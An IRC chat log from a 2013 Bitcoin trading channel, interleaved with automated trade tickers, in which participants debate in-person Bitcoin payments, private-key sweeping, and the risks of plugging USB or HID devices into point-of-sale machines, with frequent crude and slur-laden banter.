[BTCTC] [DMS.SELLING] 23 @ 0.009594 = 0.2207 BTC [+] Sep 11 17:20:00 nubbins` wasn't gold. oldest scam in the book is guy "finds" some gold item together with you Sep 11 17:20:04 [HAVELOCK] [CBTC] 235 @ 0.00041 = 0.0964 BTC [+] Sep 11 17:20:19 [HAVELOCK] [CBTC] 200 @ 0.00042 = 0.084 BTC [+] Sep 11 17:20:30 dumbravata, does that mean brave idiot? Sep 11 17:20:33 [HAVELOCK] [CBTC] 165 @ 0.00042 = 0.0693 BTC [+] Sep 11 17:20:39 coulda been gold. lot of addicts around here, and they like breaking into houses and stealing things Sep 11 17:20:47 dumbravita is the diminutive of dumbrava, which means glade. Sep 11 17:20:50 [HAVELOCK] [CBTC] 400 @ 0.00042 = 0.168 BTC [+] Sep 11 17:21:04 nubbins` which they take to the pawnshop first. Sep 11 17:21:14 no pawn shops here Sep 11 17:21:17 http://americandad.wikia.com/wiki/The_Golden_Turd Sep 11 17:21:18 The Golden Turd - American Dad Wiki - Roger, Steve, Stan Sep 11 17:21:26 oh man Sep 11 17:21:28 thats an idea Sep 11 17:21:32 nubbins` you just can't see them, cause you're not addicted enough. Sep 11 17:21:32 bitcoin pawn shops Sep 11 17:21:35 BTC-only pawn shop! Sep 11 17:21:37 [HAVELOCK] [CBTC] 500 @ 0.00042 = 0.21 BTC [+] Sep 11 17:21:43 mircea_popescu: ooh, true enough Sep 11 17:21:43 [HAVELOCK] [XBOND] 224 @ 0.001177 = 0.2636 BTC [+] Sep 11 17:21:47 get all the down and out people learning bitcoin Sep 11 17:21:55 and becoming 'investors' Sep 11 17:22:02 ThickAsThieves yeah we defo need more of those, splendor. Sep 11 17:22:54 i'm sure there are plenty of legit reasons why this is a bad approach: https://bitcointalk.org/index.php?topic=291904.0 Sep 11 17:22:57 but i can't think of any Sep 11 17:23:03 help! Sep 11 17:23:13 are pawn shops exempt from the giving money to retards rules? Sep 11 17:23:16 [HAVELOCK] [CBTC] 500 @ 0.00042 = 0.21 BTC [+] Sep 11 17:23:46 i think so Sep 11 17:23:51 [HAVELOCK] [CBTC] 250 @ 0.00042 = 0.105 BTC [+] Sep 11 17:24:01 because later, the retards buy back the things they pawned Sep 11 17:24:10 and realize a net loss of money Sep 11 17:24:12 indeed Sep 11 17:24:53 [BTCTC] [BTC-GROWTH] 70 @ 0.09863 = 6.9041 BTC [-] Sep 11 17:24:54 [BTCTC] [BTC-GROWTH] 50 @ 0.09862 = 4.931 BTC [-] Sep 11 17:25:28 ThickAsThieves giving. not trading. Sep 11 17:25:37 you may trade with a retard, you may not give him money. Sep 11 17:25:47 [HAVELOCK] [AM100] 5 @ 0.0214 = 0.107 BTC [+] Sep 11 17:25:47 hmm Sep 11 17:25:57 that makes these gem IPOs an offense Sep 11 17:26:03 i give money to retards indirectly via taxes Sep 11 17:26:17 since some of these issuers are indeed retards getting money Sep 11 17:26:51 i'd consider that a case of facilitating retards giving money to other retards Sep 11 17:26:52 [HAVELOCK] [CBTC] 4000 @ 0.00041 = 1.64 BTC [-] Sep 11 17:26:56 brokerage, if you will Sep 11 17:26:57 haha Sep 11 17:27:11 case in point, cbtc Sep 11 17:27:17 which is now trading for 2x ipo Sep 11 17:27:28 Near 2x Sep 11 17:27:35 above 2x! Sep 11 17:27:38 ^ Sep 11 17:27:41 assbot: [HAVELOCK] [CBTC] 4000 @ 0.00041 = 1.64 BTC [-] Sep 11 17:28:24 so in this example, we have a retard buying 4000 shares Sep 11 17:28:28 ThickAsThieves it is an offense, and they're not going tgo heaven. Sep 11 17:28:53 half of which goes to the retard operating the ipo, half of which goes to the guy selling the shares Sep 11 17:29:03 nubbins` you're going to have to supply anexecutive summary, im not reading all that Sep 11 17:29:17 props to you for writing it in forum prose, which is a good thing. Sep 11 17:29:50 mircea_popescu: essentially, the only sensible way to conduct a face-to-face transaction is to hand the vendor a private key, which they sweep Sep 11 17:30:07 you then provide them a public address for them to send your change to Sep 11 17:30:22 what is wrong with going there with a blockchain wallet loaded with the exact sum and giving them the url ? Sep 11 17:30:28 [HAVELOCK] [XBOND] 1 @ 0.001177 BTC [+] Sep 11 17:30:48 nothing wrong, but why not just show them a QR code? Sep 11 17:30:54 a url is a qr code. Sep 11 17:31:01 they scan it with a webcam Sep 11 17:31:08 software automatically sweeps funds Sep 11 17:31:30 anyway, the exact implementation isn't important Sep 11 17:31:31 im not even sure how either these perfectly functional methods differ from what's currently done ? Sep 11 17:31:34 i've never done one of these. Sep 11 17:31:37 why would you show your privates to anyone Sep 11 17:32:11 [BTCTC] [TAT.ASICMINER] 30 @ 0.02178 = 0.6534 BTC [+] Sep 11 17:32:11 well, currently, you walk into a cafe and they say "wanna pay with bitcoin? send your BTC to this address!" Sep 11 17:32:32 are you gonna doble spend a coffee worth ? Sep 11 17:32:33 so then you have to fire up your smartphone app, scan their QR, send the coins, wait for confirmation Sep 11 17:32:37 YUP Sep 11 17:32:40 Double spend on coffee Sep 11 17:32:44 best scam ever Sep 11 17:32:53 or you can just hand them a private key and walk away Sep 11 17:32:56 there were some complaints from vendors that the tx sometimes takes long time to arrive, what if the internet is not working, etc.. Sep 11 17:33:07 nubbins` if they know aforehand how much the coffee will be. Sep 11 17:33:26 "Bob visits his first store and purchases a pair of sunglasses for 0.15 BTC. He provides the cashier with a QR code for 0.2 BTC, which is swept; he then provides the QR code for his change address, to which the cashier sends his change, 0.05 BTC." Sep 11 17:33:28 then they should use a well connected 3rd party Sep 11 17:33:33 i still think for coffee etc the method described on trilema last year is best, ie, buy company scrip monthly. Sep 11 17:33:43 lol Sep 11 17:33:47 company scrip like your credits? Sep 11 17:33:47 get 50 coffee coupons or w/e. Sep 11 17:33:50 nubbins`: giving a privkey is the same as sending a tx when it comes to double spending Sep 11 17:33:51 yes basically. Sep 11 17:34:05 or Sep 11 17:34:06 I don't think you could have made that sound any more communists... Sep 11 17:34:07 Scrat is correct. no difference. Sep 11 17:34:07 [BTCTC] [ASICMINER-PT] 1 @ 2.286 BTC [-] Sep 11 17:34:08 just wait a few years Sep 11 17:34:11 [BTCTC] [DMS.MINING] 16 @ 0.002558 = 0.0409 BTC [-] Sep 11 17:34:12 and buy the coffee company Sep 11 17:34:13 communist* Sep 11 17:34:15 alltogeher Sep 11 17:34:21 sure Sep 11 17:34:25 [BTCTC] [ASICMINER-PT] 1 @ 2.319 BTC [+] Sep 11 17:34:26 [BTCTC] [ASICMINER-PT] 1 @ 2.32 BTC [+] Sep 11 17:34:27 [BTCTC] [ASICMINER-PT] 1 @ 2.32 BTC [+] Sep 11 17:34:28 thestringpuller corporate scrip is as american as apple pie. Sep 11 17:34:29 [BTCTC] [ASICMINER-PT] 3 @ 2.321 = 6.963 BTC [+] Sep 11 17:34:30 or even moreso. Sep 11 17:34:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02178 = 0.0436 BTC [+] Sep 11 17:34:43 nah jazz is more american than apple pie Sep 11 17:34:44 or buy a coffee machine now... preferably with asic heater :D Sep 11 17:34:54 [BTCTC] [DMS.PURCHASE] 16 @ 0.01203 = 0.1925 BTC [-] Sep 11 17:35:05 jurov or buy a turkish girl that makes coffee Sep 11 17:35:11 bellydances, suckles feet and etc. Sep 11 17:35:26 Scrat: the other side is that ANY smartphone can display QR codes. some smartphones (*cough* apple) don't want you to run bitcoin wallets Sep 11 17:35:30 don't turkish girls do that anyway? Sep 11 17:35:31 oh there are? i saw only ukrainians so far Sep 11 17:35:31 you mean a turkish boy Sep 11 17:35:47 hell, you could make a low-cost e-ink device that you can load with QR codes Sep 11 17:35:54 doesn't even need to be connected to the internet Sep 11 17:36:01 nubbins`: maybe apple should stop sucking cock. in the meantime html5 app webwallets will do Sep 11 17:36:07 [BTCTC] [ASICMINER-PT] 1 @ 2.286 BTC [-] Sep 11 17:36:12 nubbins`: would yo have a qr code for private key, then qr code for public? Sep 11 17:36:12 or you could just print a sheet of QR codes on paper Sep 11 17:36:13 nubbins` which is why urls aere better. Sep 11 17:36:17 they will always display an url. Sep 11 17:36:39 or trezor like device Sep 11 17:36:39 thestringpuller: yes Sep 11 17:36:43 NO Sep 11 17:36:44 [BTCTC] [TAT.ASICMINER] 42 @ 0.02178 = 0.9148 BTC [+] Sep 11 17:36:45 trezor Sep 11 17:36:49 terrible idea Sep 11 17:36:50 kakobrekla you're confusing me. which is the boy again ? the one with the tits ? Sep 11 17:36:59 :p Sep 11 17:37:12 [BTCTC] [ASICMINER-PT] 1 @ 2.32 BTC [+] Sep 11 17:37:14 [BTCTC] [ASICMINER-PT] 9 @ 2.321 = 20.889 BTC [+] Sep 11 17:37:15 [BTCTC] [ASICMINER-PT] 5 @ 2.324 = 11.62 BTC [+] Sep 11 17:37:15 kakobrekla: if you were a vendor, and you accepted BTC, why the FUCK would you let people plug foreign USB devices into your POS? Sep 11 17:37:15 why we can't have both? tits *and* dick, i mean? Sep 11 17:37:27 it's the height of retardedness Sep 11 17:37:29 i said trezor like Sep 11 17:37:29 jurov are you gay for bridget ? Sep 11 17:37:32 nubbins`: so isn't this essentially just paper wallets in the form of bills? Sep 11 17:37:34 not trezor Sep 11 17:37:45 nubbins` what's the big deal with letting your pos make sweet sweet machine love to random sticks ? Sep 11 17:37:46 thestringpuller: that's exactly what it is Sep 11 17:38:05 mircea_popescu: no big deal as long as it doesn't handle money Sep 11 17:38:07 oh wait, it does Sep 11 17:38:24 every good whore handles a lot of money, so what of it ? Sep 11 17:38:38 if i mail you a USB stick, will you plug it into a machine that holds all your private keys? Sep 11 17:38:46 but seriously, what's the big deal ? you trying to ALSO run all this on windows or something ? Sep 11 17:39:01 how is the pos holding your private keys ?! Sep 11 17:39:07 misogyny much Sep 11 17:39:17 jcpham|twrk is that your twerking nick ? Sep 11 17:39:24 well, how the fuck else is it giving change to people? Sep 11 17:39:25 you better believe it Sep 11 17:39:33 nubbins` hotwallet. Sep 11 17:39:42 exactly Sep 11 17:39:53 and now you've plugged a strange USB device into a machine with a hotwallet Sep 11 17:39:56 but hotwallet is not ALL your private keys. Sep 11 17:40:10 in a perfect world, yes Sep 11 17:40:24 it boggles me that you think plugging in a hotwallet is substantially different from plugging in a net card. Sep 11 17:40:54 eh a usb stick i mean not a hotwallet. Sep 11 17:41:19 ... Sep 11 17:41:33 anyway, for samoans that didn't get the bridget reference : http://knowyourmeme.com/memes/bridget Sep 11 17:41:44 it boggles me that you think plugging in a strange USB device is no more dangerous than being connected to the internet Sep 11 17:41:55 ^^^ Sep 11 17:42:04 we can't really get better than transferring the transaction to vendor by NFC, QR code or however Sep 11 17:42:16 NFC/QR provides an air gap Sep 11 17:42:24 then it's up to vendor to not get doublespended Sep 11 17:42:25 tremor provides a bridge for a foreign army to walk over Sep 11 17:42:31 nubbins` you don't airgap hot machines wtf. Sep 11 17:42:32 [BTCTC] [ASICMINER-PT] 1 @ 2.323 BTC [-] Sep 11 17:42:33 trezor Sep 11 17:42:36 is this shamanic securitah ? Sep 11 17:43:04 you airgap them from the public, yes Sep 11 17:43:11 the internet IS the public. wtf. Sep 11 17:43:30 letting someone plug a device into your computer is the same as letting someone stick their dick in you without a condom Sep 11 17:43:39 this is exactly true Sep 11 17:43:50 sure, you might get a disease just from walking around in public Sep 11 17:43:51 your concern however comes while you've got a number of dicks down your throat already Sep 11 17:44:05 seems out of place, we'd think your resistance is inside, or else you wouldn't be doing the deepthroating. Sep 11 17:44:11 but your chances of getting a disease are WAY higher if you get a tattoo on your ass that says "open for business" Sep 11 17:44:31 understand. as long as you're on the internet it's already thus tattooed. Sep 11 17:44:44 you're just protecting against something that's more visible to you, hence the shamanism. Sep 11 17:44:50 you gotta go by what is not by what seems. Sep 11 17:45:07 [BTCTC] [TAT.ASICMINER] 62 @ 0.02178 = 1.3504 BTC [+] Sep 11 17:46:04 not only more visible, but higher risk Sep 11 17:46:37 [BTCTC] [ASICMINER-PT] 5 @ 2.324 = 11.62 BTC [+] Sep 11 17:46:38 [BTCTC] [ASICMINER-PT] 6 @ 2.325 = 13.95 BTC [+] Sep 11 17:46:41 you only perceive higher risk because it's more visible to you. Sep 11 17:46:54 it makes you physically insert something, this is psychologically big Sep 11 17:47:02 tyhe internet just hums along, so it's psychologically small. Sep 11 17:47:08 this isn't true, they're the same exact thing. Sep 11 17:47:09 [BTCTC] [TAT.ASICMINER] 22 @ 0.02178 = 0.4792 BTC [+] Sep 11 17:47:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.02178 = 0.2178 BTC [+] Sep 11 17:47:10 for example: i'd like you to compromise the computer i'm currently using. you have unlimited physical access. Sep 11 17:47:26 are you going to use that physical access, or not? Sep 11 17:47:30 obviously you're going to Sep 11 17:47:32 inserting sticks != unlimited physical access. Sep 11 17:47:42 it's a bad analogy. Sep 11 17:47:49 inserting tremor = unlimited physical access Sep 11 17:47:52 TREZOR Sep 11 17:47:54 argh Sep 11 17:48:03 [MPEX] [S.MPOE] 5704 @ 0.00089417 = 5.1003 BTC [-] Sep 11 17:48:07 i dont know much about trezor, never used it, never considered it. Sep 11 17:48:16 it's a HID device Sep 11 17:48:26 i.e. your computer recognizes it as a fucking KEYBOARD Sep 11 17:48:36 how long till am div data comes in? Sep 11 17:49:04 [BTCTC] [ASICMINER-PT] 4 @ 2.325 = 9.3 BTC [+] Sep 11 17:49:05 [BTCTC] [ASICMINER-PT] 4 @ 2.329 = 9.316 BTC [+] Sep 11 17:49:06 [BTCTC] [ASICMINER-PT] 15 @ 2.33 = 34.95 BTC [+] Sep 11 17:49:08 [BTCTC] [ASICMINER-PT] 15 @ 2.333 = 34.995 BTC [+] Sep 11 17:49:09 [BTCTC] [ASICMINER-PT] 1 @ 2.333 BTC [+] Sep 11 17:49:10 [BTCTC] [ASICMINER-PT] 4 @ 2.335 = 9.34 BTC [+] Sep 11 17:49:11 [BTCTC] [ASICMINER-PT] 1 @ 2.349 BTC [+] Sep 11 17:49:12 [BTCTC] [ASICMINER-PT] 15 @ 2.35 = 35.25 BTC [+] Sep 11 17:49:20 nubbins` is this some sort of windows specific thing ? Sep 11 17:49:26 no idea Sep 11 17:49:36 i'm assuming HID is platform-independent Sep 11 17:49:44 [BTCTC] [ASICMINER-PT] 1 @ 2.355 BTC [+] Sep 11 17:50:15 http://en.wikipedia.org/wiki/Human_interface_device Sep 11 17:50:37 well so inasmuch as it's some datafeed i fail to see the problem. Sep 11 17:50:48 be it a stick, the net card or some hid, a data feed is a data feed. Sep 11 17:51:06 your application could be buggy, in which case you'll get owned, maybe. Sep 11 17:51:15 your application could be safe, in which case you're safe. Sep 11 17:51:23 trivial to restrict net access Sep 11 17:51:32 trivial to restrict any acces eh ?! Sep 11 17:51:33 non-trivial to restrict HID devices Sep 11 17:51:43 hence my windows question. Sep 11 17:51:48 in saneworld it's equally trivial. Sep 11 17:51:54 HID apis are available for any modern OS Sep 11 17:52:07 [BTCTC] [ASICMINER-PT] 3 @ 2.355 = 7.065 BTC [+] Sep 11 17:52:38 problem is, how does the OS know whether "send all BTC to xyz" is coming from the actual keyboard or the fake trezor? Sep 11 17:52:44 [BTCTC] [ASICMINER-PT] 1 @ 2.355 BTC [+] Sep 11 17:52:53 mircea_popescu: https://www.securepla.net/dont-stick-that-in-there-hid-human-interface-device/ Sep 11 17:52:55 [HAVELOCK] [CBTC] 2 @ 0.00042 = 0.0008 BTC [+] Sep 11 17:53:08 plugging a trezor into a computer = plugging a keyboard/mouse into a computer Sep 11 17:53:34 [BTCTC] [ASICMINER-PT] 5 @ 2.355 = 11.775 BTC [+] Sep 11 17:54:54 if you work in an office, tell the help desk that you plugged a usb stick into your computer and now it's acting strangely Sep 11 17:55:01 and then see how they react Sep 11 17:55:46 [BTCTC] [CIPHERMINE.B1] 2 @ 0.01073 = 0.0215 BTC [-] Sep 11 17:56:17 [BTCTC] [TAT.ASICMINER] 2 @ 0.022 = 0.044 BTC [+] Sep 11 17:56:18 [BTCTC] [TAT.ASICMINER] 20 @ 0.022 = 0.44 BTC [+] Sep 11 17:56:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.022 = 0.22 BTC [+] Sep 11 17:56:21 [BTCTC] [TAT.ASICMINER] 35 @ 0.0224 = 0.784 BTC [+] Sep 11 17:56:43 a likely response would be "why did you plug a strange device into your computer, you fucking asshole?" Sep 11 17:56:52 [BTCTC] [TAT.ASICMINER] 1 @ 0.0224 BTC [+] Sep 11 17:57:10 http://j00ru.vexillium.org/?p=1272 Sep 11 17:57:17 Introducing the USB Stick of Death | j00ru//vx tech blog Sep 11 17:57:24 works great on fully-patched modern winblows. Sep 11 17:57:32 [BTCTC] [DMS.PURCHASE] 1 @ 0.01203 BTC [-] Sep 11 17:57:44 the HID stick, on the other hand, works everywhere. Sep 11 17:57:54 yep Sep 11 17:58:13 allowing free access to usb ports exponentially increases the attack surface Sep 11 17:58:26 all you need to know for the HID trick is what keyboard commands the victim's box responds to. Sep 11 17:58:51 asciilifeform heya Sep 11 17:59:06 sent you a mail, look. Sep 11 17:59:09 now, suppose the trezor instead just displayed private keys Sep 11 17:59:13 no need to plug it into POS Sep 11 17:59:20 no need to increase attack surface Sep 11 17:59:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.0224 BTC [+] Sep 11 17:59:28 [BTCTC] [DMS.MINING] 3 @ 0.00266 = 0.008 BTC [+] Sep 11 17:59:43 nubbins` is the office running windows ? Sep 11 17:59:59 it's running a mixture of osx, linux, and windows Sep 11 18:00:17 hell, maybe some iSeries/DB2 machines as well Sep 11 18:00:24 or qrcode the singed tx which then the pos checks against blockchain and sends out Sep 11 18:00:38 there are plenty of options Sep 11 18:00:45 private keys are called private for a reason Sep 11 18:00:49 not cause its cool Sep 11 18:01:03 a five-dollar bill is a private key Sep 11 18:01:11 i carry cc Sep 11 18:01:31 signing the tx requires the purchaser to have net access Sep 11 18:01:42 so does CC Sep 11 18:01:49 ;;bc,convert krw Sep 11 18:01:49 1 BTC = 138.61638 U.S. dollars = 150 506.384 South Korean won Sep 11 18:01:49 and everyone fuckin uses them Sep 11 18:01:53 well ccs aren;t exactly a paragon of security. Sep 11 18:01:59 or the purchaser could just generate a ton of throwaway addresses, load each with some BTC, and hand over a private key whenever he makes a purchase Sep 11 18:02:08 they arent but still net access is not the issue there Sep 11 18:02:21 [BTCTC] [DMS.SELLING] 3 @ 0.00949 = 0.0285 BTC [-] Sep 11 18:02:33 dunno even ATMs here Sep 11 18:02:37 use 56k connections Sep 11 18:02:43 no problems Sep 11 18:03:42 ;;bc,convert ils Sep 11 18:03:42 1 BTC = 138.56761 U.S. dollars = 493.882446 Israeli shekels Sep 11 18:03:58 kakobrekla atms are designed to work offline on a reconciliatory basis, it's a complex thing Sep 11 18:04:00 now, i mean, obviously sweeping isn't the best way to conduct ALL transactions Sep 11 18:04:10 but given the lack of alternatives Sep 11 18:04:19 it's an obvious front-runner Sep 11 18:05:05 sure, it requires the purchaser to perform a modicum of work before they go shopping Sep 11 18:05:06 maybe doesnt change the fact most txes today are done via cc terminal Sep 11 18:05:15 but it's no more inconvenient than going to the bank to withdraw cash Sep 11 18:05:31 kakobrekla: cash is still king in many, many places Sep 11 18:05:49 we dont particularly care for nigerias mobile credits Sep 11 18:06:08 [BTCTC] [DMS.PURCHASE] 3 @ 0.01203 = 0.0361 BTC [-] Sep 11 18:06:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00061 BTC [+] Sep 11 18:06:19 sure Sep 11 18:06:38 but let's say that you want to spend btc at a store Sep 11 18:06:47 how would you do it? Sep 11 18:06:58 ideal scenario Sep 11 18:07:04 certanly not by showing them my privates Sep 11 18:07:25 id took out a device, enter sum and show them qr code which contains signed tx Sep 11 18:07:31 which they can broadcast Sep 11 18:07:36 okay, sweet! Sep 11 18:07:49 oh, whoops, the cell service sucks inside this mall Sep 11 18:07:54 you can't get a net connection Sep 11 18:08:02 what now? Sep 11 18:08:13 the metor crashed into your forehaed, what now Sep 11 18:08:17 if only you had a throwaway address with some BTC Sep 11 18:08:35 they should ged wired internets Sep 11 18:08:38 get Sep 11 18:08:47 for your smartphone? Sep 11 18:08:51 just like anyone who has cc terminal Sep 11 18:08:55 needs to have internets Sep 11 18:08:57 sorry but i'm not carrying paper to transact, simple as that Sep 11 18:08:58 its not a big deal in 2013 Sep 11 18:09:20 if i am, itd be fiat Sep 11 18:09:26 ThickAsThieves: so carry a phone with a couple of QR codes loaded into the camera roll Sep 11 18:09:36 its nonsense Sep 11 18:09:40 yep Sep 11 18:09:43 or one of the thousands of dedicated qr apps Sep 11 18:09:43 you want people to plan? Sep 11 18:09:51 it's a lot to ask, i know Sep 11 18:09:58 so a dead idea Sep 11 18:10:08 nubbins`: if there is no connection, you don't have any advantage with paper either Sep 11 18:10:17 you could have doublespent it anyway Sep 11 18:10:25 yup Sep 11 18:10:32 no connection for your phone. POS has wired access Sep 11 18:10:58 honestly i dotn even like the idea of bitcoin for coffee anyway Sep 11 18:11:02 what are the daily/montly volume numbers for coinbase? Sep 11 18:11:06 where can one find this? Sep 11 18:11:09 regardless of method Sep 11 18:11:25 ThickAsThieves: it's admittedly a poor payment choice for any in-person transaction Sep 11 18:11:32 POS will be operated by a payment processor which can issue you code in case vendor has no connection Sep 11 18:11:50 [HAVELOCK] [CBTC] 50 @ 0.000419 = 0.021 BTC [-] Sep 11 18:11:52 and you will either have these codes or cash. NOT bitcoin private keys Sep 11 18:12:11 vendors will not muck with them Sep 11 18:12:23 not much mucking involved Sep 11 18:12:33 just as simple as scanning a barcode on the product you're purchasing Sep 11 18:12:54 buyer places QR under reader, POS beeps, coins have been swept Sep 11 18:13:05 man coinbase limits are pretty lame Sep 11 18:13:28 just move the online experience to IRL Sep 11 18:13:28 ...and later they realize you doublespent them, yea? Sep 11 18:13:36 have a kiosk at each register Sep 11 18:13:47 use some way to login and pay Sep 11 18:13:47 if i already spent the coins, they can't very well sweep them, can they? Sep 11 18:14:12 have your own wallet account strictly for out and about spending Sep 11 18:14:12 [BTCTC] [DMS.SELLING] 65 @ 0.009592 = 0.6235 BTC [+] Sep 11 18:14:13 [BTCTC] [DMS.SELLING] 23 @ 0.009593 = 0.2206 BTC [+] Sep 11 18:14:14 nubbins: either vendor has internet connection and he can accept classical bitcoin tx Sep 11 18:14:14 [BTCTC] [DMS.SELLING] 5 @ 0.0096 = 0.048 BTC [+] Sep 11 18:14:15 [BTCTC] [DMS.SELLING] 3 @ 0.00961 = 0.0288 BTC [+] Sep 11 18:14:16 [BTCTC] [DMS.SELLING] 30 @ 0.00963 = 0.2889 BTC [+] Sep 11 18:14:17 [BTCTC] [DMS.SELLING] 84 @ 0.00965 = 0.8106 BTC [+] Sep 11 18:14:18 [BTCTC] [DMS.SELLING] 80 @ 0.0097 = 0.776 BTC [+] Sep 11 18:14:25 or he does not and your sweeping will not help him Sep 11 18:14:35 i shouldnt need to carry anything at all really Sep 11 18:14:38 if i wanna spend Sep 11 18:14:43 just my brain Sep 11 18:14:44 [HAVELOCK] [CBTC] 7983 @ 0.00042 = 3.3529 BTC [+] Sep 11 18:14:46 [HAVELOCK] [CBTC] 500 @ 0.00042 = 0.21 BTC [+] Sep 11 18:15:06 jurov: so how does the buyer construct the tx? Sep 11 18:15:12 or sign it? Sep 11 18:15:30 it can be constructed offline with any contemporary portable device Sep 11 18:15:34 ThickAsThieves a brain is a terrible thing to spend. Sep 11 18:15:54 can i do it with my iphone? Sep 11 18:16:01 we're all gonna die anyway Sep 11 18:16:07 mise well cash out Sep 11 18:16:11 ThickAsThieves: so you want to carry several brainwallets and learn new ones after you spend them? Sep 11 18:16:17 no Sep 11 18:16:20 consider this Sep 11 18:16:33 have a blockchain.info account that has spending money in it Sep 11 18:16:40 login at register, spend when needed Sep 11 18:16:47 not much diff than a credit card really Sep 11 18:16:51 how do you login at the register? Sep 11 18:16:54 cept you login with a magnet Sep 11 18:17:00 but you have to provide your passphrase to POS, no? Sep 11 18:17:05 by typing your un/pw into a random computer?> Sep 11 18:17:14 sounds safe Sep 11 18:17:15 this is worse than a credit card? Sep 11 18:17:23 well, yes Sep 11 18:17:26 wel, no Sep 11 18:17:34 credit card fraud: visa pays you back Sep 11 18:17:40 btc fraud: mp pays you back? Sep 11 18:17:48 no, gavin Sep 11 18:17:51 ah Sep 11 18:17:51 right Sep 11 18:17:53 lol Sep 11 18:17:55 ok, problem solved Sep 11 18:18:10 at some point you need trust for convenience Sep 11 18:18:24 i only trust ziggap and bakewell Sep 11 18:18:30 perv. Sep 11 18:18:32 feel free to come over to my house whenever you want, i'll let you log in to your blockchain.info account Sep 11 18:18:39 i swear i won't steal every cent Sep 11 18:18:44 nubbins` i tell you, scrip. Sep 11 18:18:58 so use 2-fa Sep 11 18:19:02 or sumth Sep 11 18:19:07 For the reasons noted and for many other reasons I am pretty much satisfied that Bitcoin is not nor will it ever be a direct means of payment for retail anything. You may end up paying for a month’s worth of coffee vouchers at your favourite coffee shop via Bitcoin (so shop scrip built on top of Bitcoin), you may end up settling your accounts monthly at the restaurant in Bitcoin (so store credit built on top of Bitco Sep 11 18:19:07 in), you will probably cash into whatever local currency from Bitcoin (be it Unified Standard Dubaloos or Universally Simplified Dosidoes or whatever else) but all that is entirely different a story. Sep 11 18:19:10 2-fa won't help Sep 11 18:19:15 http://trilema.com/2013/bitcoin-prices-bitcoin-inflexibility/#comment-92015 < Sep 11 18:19:19 obviously the terminal will immediately steal your funds Sep 11 18:19:23 before the 2fa code expires Sep 11 18:19:26 gotta agree with mp Sep 11 18:19:28 Bitcoin prices, Bitcoin inflexibility pe Trilema - Un blog de Mircea Popescu. Sep 11 18:19:49 bittab Sep 11 18:19:50 hm Sep 11 18:19:58 pit it on my bittab sir! Sep 11 18:20:00 [HAVELOCK] [CFIG] 2 @ 0.134625 = 0.2693 BTC [+] Sep 11 18:20:02 put* Sep 11 18:20:08 bittab is actually not a bad name Sep 11 18:20:14 it will be solved nicely by payment processor.. you will get one time codes or some swag from bitpay Sep 11 18:20:21 and use them. Sep 11 18:20:29 [HAVELOCK] [CBTC] 3880 @ 0.00044 = 1.7072 BTC [+] Sep 11 18:20:35 no need for vendor to bother Sep 11 18:20:39 [BTCTC] [NASTY-PT] 10 @ 0.002 = 0.02 BTC [+] Sep 11 18:20:53 or for you to pay tx fees every time Sep 11 18:20:57 [HAVELOCK] [CFIG] 1 @ 0.134625 BTC [+] Sep 11 18:21:12 jurov so centralised store credit on top of bitcoin :) Sep 11 18:21:22 hm Sep 11 18:21:24 periodic settlement and all that. yup. Sep 11 18:21:31 so scrip is essentially the idea behind gift cards Sep 11 18:21:33 one-time codes sounds an awful lot like 2fa anyway Sep 11 18:21:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0224 BTC [+] Sep 11 18:21:44 [BTCTC] [TAT.ASICMINER] 29 @ 0.0224 = 0.6496 BTC [+] Sep 11 18:22:37 "well, you can pay for purchases with cash or cc, or if you like, you can buy gift cards with cash, cc, or bitcoin, and then use the gift card to buy things" Sep 11 18:22:48 yep, that's gonna lead to an explosion in BTC usage Sep 11 18:23:03 gyft is already banking on this Sep 11 18:23:11 yeah Sep 11 18:23:15 problem is, why buy btc? Sep 11 18:23:26 why not just cash->scrip? Sep 11 18:23:34 instead of cash->btc->scrip? Sep 11 18:23:41 [MPEX] [S.MPOE] 13900 @ 0.00089243 = 12.4048 BTC [-] Sep 11 18:23:44 well thats not how it is for everyone Sep 11 18:23:48 true Sep 11 18:23:56 much of my income is btc now Sep 11 18:24:01 it would only be a way for current btc holders to divest themselves of their BTC Sep 11 18:24:10 remember, we are talking about coffee. and about people who happen to have btc income Sep 11 18:24:40 just buy a starbucks gyftcard and move on Sep 11 18:24:47 charbucks! Sep 11 18:24:55 if you're starting with cash or you want to speak about bigger payments then it does not apply Sep 11 18:25:08 i roasted coffee off and on for a couple of years, and starbucks roasts are shit Sep 11 18:25:22 ok but the brand wasnt my point Sep 11 18:25:35 sorry, i tend to rant about coffee Sep 11 18:25:49 for coffee payments the centralized store credit makes sense Sep 11 18:26:19 i like kako's plan Sep 11 18:26:24 just buy the coffee shop Sep 11 18:26:27 heh Sep 11 18:26:37 buy a good coffee shop and ONLY accept btc Sep 11 18:26:49 nubbins` no reason. btc is for rich people who want to keep savings. Sep 11 18:26:54 it's not interesing or useful for the peons Sep 11 18:27:00 i like mp's plan. buy someone who makes good coffee and invite ppl Sep 11 18:27:02 other than because its existance keeps governments in check. Sep 11 18:27:17 mircea_popescu: fair enough Sep 11 18:27:33 see, many things that exist today are sueful to you indirectly. Sep 11 18:27:38 you don't OWN a nuclear warhead. Sep 11 18:27:40 nor could you Sep 11 18:27:51 nevertheless, the fact that people do is what keeps things moving along smoothly. Sep 11 18:29:10 i think it's the fundamental cluelessness of people missing this obvcious poitn that has everyone trying to push bitcoin on any and all, as if that's a good idea Sep 11 18:29:24 so essentially, accepting btc at pos is a useless beat-off Sep 11 18:29:29 wasting the time of restaurant owners with trying to handle in-store btc payments as if those have a future opr even make sense Sep 11 18:29:41 well, it's a novelty item, but not fundamentally useful. Sep 11 18:30:18 you're making perfect sense Sep 11 18:30:31 [BTCTC] [DMS.MINING] 167 @ 0.00266 = 0.4442 BTC [+] Sep 11 18:30:32 [BTCTC] [DMS.MINING] 16 @ 0.002661 = 0.0426 BTC [+] Sep 11 18:30:33 [BTCTC] [DMS.MINING] 133 @ 0.002661 = 0.3539 BTC [+] Sep 11 18:30:39 i am known for two things : being an arrogant mysoginistic asshole pig Sep 11 18:30:44 and making perfect sense. Sep 11 18:30:44 nod Sep 11 18:31:08 in that order? ;) Sep 11 18:31:19 at the same time Sep 11 18:31:20 well obviously it depends where you're looking from. Sep 11 18:31:22 lel Sep 11 18:31:30 i'm like one of those magical items of antiquity. Sep 11 18:31:45 ;;google lycurgus cup Sep 11 18:31:45 Lycurgus Cup - 